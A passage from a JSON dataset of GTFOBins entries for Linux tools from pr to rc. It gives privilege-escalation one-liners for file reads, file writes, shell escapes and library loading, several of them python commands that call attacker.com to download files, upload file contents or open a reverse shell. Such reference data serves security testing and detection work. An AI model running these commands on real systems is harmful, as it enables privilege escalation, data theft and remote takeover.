/path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pr/"]},{"id":"gtfo:pr:file-read:0:suid","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pr -T /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pr/"]},{"id":"gtfo:pr:file-read:0:unprivileged","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pr -T /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pr/"]},{"id":"gtfo:procmail:command:0:sudo","toolId":"gtfo:procmail","toolName":"procmail","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e ':0\\n| /path/to/command >/path/to/temp-file\nprocmail -m /path/to/temp-file","description":"The program is picky about the file ownership, and waits for some input.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/procmail/"]},{"id":"gtfo:procmail:command:0:unprivileged","toolId":"gtfo:procmail","toolName":"procmail","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo -e ':0\\n| /path/to/command >/path/to/temp-file\nprocmail -m /path/to/temp-file","description":"The program is picky about the file ownership, and waits for some input.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/procmail/"]},{"id":"gtfo:pry:inherit:0:sudo","toolId":"gtfo:pry","toolName":"pry","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"pry","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pry/"]},{"id":"gtfo:pry:inherit:0:unprivileged","toolId":"gtfo:pry","toolName":"pry","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"pry","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pry/"]},{"id":"gtfo:psftp:shell:0:sudo","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psftp/"]},{"id":"gtfo:psftp:shell:0:suid","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psftp/"]},{"id":"gtfo:psftp:shell:0:unprivileged","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psftp/"]},{"id":"gtfo:psql:inherit:0:sudo","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:psql:inherit:0:suid","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:psql:inherit:0:unprivileged","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:psql:shell:0:sudo","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:psql:shell:0:suid","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:psql:shell:0:unprivileged","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psql/"]},{"id":"gtfo:ptx:file-read:0:sudo","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ptx/"]},{"id":"gtfo:ptx:file-read:0:suid","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ptx/"]},{"id":"gtfo:ptx:file-read:0:unprivileged","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ptx/"]},{"id":"gtfo:puppet:file-read:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"puppet filebucket -l diff /dev/null /path/to/input-file","description":"The read file content is corrupted by the `diff` output format. The actual `diff` command is executed.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:puppet:file-read:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"puppet filebucket -l diff /dev/null /path/to/input-file","description":"The read file content is corrupted by the `diff` output format. The actual `diff` command is executed.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:puppet:file-write:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"puppet apply -e 'file { \"/path/to/output-file\": content => \"DATA\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:puppet:file-write:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"puppet apply -e 'file { \"/path/to/output-file\": content => \"DATA\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:puppet:shell:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"puppet apply -e \"exec { '/bin/sh <$(tty) >$(tty) 2>$(tty)': }\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:puppet:shell:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"puppet apply -e \"exec { '/bin/sh <$(tty) >$(tty) 2>$(tty)': }\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"]},{"id":"gtfo:pwsh:file-write:0:sudo","toolId":"gtfo:pwsh","toolName":"pwsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pwsh -c '\"DATA\" | Out-File /path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pwsh/"]},{"id":"gtfo:pwsh:file-write:0:unprivileged","toolId":"gtfo:pwsh","toolName":"pwsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"pwsh -c '\"DATA\" | Out-File /path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pwsh/"]},{"id":"gtfo:pwsh:shell:0:sudo","toolId":"gtfo:pwsh","toolName":"pwsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pwsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pwsh/"]},{"id":"gtfo:pwsh:shell:0:unprivileged","toolId":"gtfo:pwsh","toolName":"pwsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pwsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pwsh/"]},{"id":"gtfo:pygmentize:file-read:0:sudo","toolId":"gtfo:pygmentize","toolName":"pygmentize","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pygmentize -l text /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pygmentize/"]},{"id":"gtfo:pygmentize:file-read:0:unprivileged","toolId":"gtfo:pygmentize","toolName":"pygmentize","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pygmentize -l text /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pygmentize/"]},{"id":"gtfo:pyright:file-read:0:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright /path/to/input-file","description":"Content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:pyright:file-read:0:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright /path/to/input-file","description":"Content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:pyright:file-read:1:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright --outputjson /path/to/input-file","description":"Content is leaked as error messages in JSON format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:pyright:file-read:1:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright --outputjson /path/to/input-file","description":"Content is leaked as error messages in JSON format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:pyright:file-read:2:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright -w /path/to/input-dir/","description":"Recursively walks directories, parsing all Python files and leaking some contents through diagnostics.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:pyright:file-read:2:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright -w /path/to/input-dir/","description":"Recursively walks directories, parsing all Python files and leaking some contents through diagnostics.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"]},{"id":"gtfo:python:download:0:sudo","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:download:0:suid","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:download:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-read:0:sudo","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-read:0:suid","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-read:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-write:0:sudo","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-write:0:suid","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:file-write:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:library-load:0:capabilities","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:library-load:0:sudo","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:library-load:0:suid","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:library-load:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:reverse-shell:0:sudo","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:reverse-shell:0:suid","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:reverse-shell:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:shell:0:capabilities","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:shell:0:sudo","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:shell:0:suid","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:shell:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:0:sudo","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:0:suid","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:1:sudo","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:1:suid","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:python:upload:1:unprivileged","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"]},{"id":"gtfo:qpdf:file-read:0:sudo","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/qpdf/"]},{"id":"gtfo:qpdf:file-read:0:suid","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/qpdf/"]},{"id":"gtfo:qpdf:file-read:0:unprivileged","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/qpdf/"]},{"id":"gtfo:rake:file-read:0:sudo","toolId":"gtfo:rake","toolName":"rake","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rake -f /path/to/input-file","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rake/"]},{"id":"gtfo:rake:file-read:0:unprivileged","toolId":"gtfo:rake","toolName":"rake","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rake -f /path/to/input-file","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rake/"]},{"id":"gtfo:rake:inherit:0:sudo","toolId":"gtfo:rake","toolName":"rake","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"rake -p '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rake/"]},{"id":"gtfo:rake:inherit:0:unprivileged","toolId":"gtfo:rake","toolName":"rake","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"rake -p '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rake/"]},{"id":"gtfo:ranger:shell:0:sudo","toolId":"gtfo:ranger","toolName":"ranger","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ranger\nS","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ranger/"]},{"id":"gtfo:ranger:shell:0:unprivileged","toolId":"gtfo:ranger","toolName":"ranger","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ranger\nS","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ranger/"]},{"id":"gtfo:rc:shell:0:sudo","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rc/"]},{"id":"gtfo:rc:shell:0:suid","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege 